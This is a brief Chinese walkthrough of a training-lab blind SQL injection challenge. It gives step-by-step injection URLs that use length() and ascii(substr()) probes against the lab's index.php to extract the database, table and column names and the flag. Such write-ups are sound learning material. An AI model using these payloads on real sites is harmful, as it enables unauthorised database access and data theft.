掌控安全less6 靶场简易--盲注
1.判断是否存在sql注入
http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1" and "1"="1
http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1" and "1"="2
页面返回不一致,初步判断存在注入
2.查询数据库长度即名称
http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1" and length(database())>=12--+
长度为12
http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1" and ascii(substr(database(),1,1))>=1--+
后使用burpsuite爆破,但注意爆破是>=应改为=
为kanwolongxia
3.查询表长以及名称
http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1" and length((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 0,1))>=1--+
为6
http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1" and ascii(substr((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 0,1),1,1))>=1--+
为loflag
同理可查第二张表与第三张表
4.查询列长以及列名
http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1"and length((select column_name from information_schema.columns where table_name='loflag' limit 0,1))>=1--+
http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1"and ascii(substr((select column_name from information_schema.columns where table_name="loflag" limit 0,1),1,1))>=1--+
第一个列查出为id
第二个列查出为flaglo
5.查询flag值
http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1" and length((select flaglo from loflag limit 2,1))>=7--+
http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1" and ascii(substr((select flaglo from loflag limit 2,1),1,1))>=1--+
flag为zKaQ-RD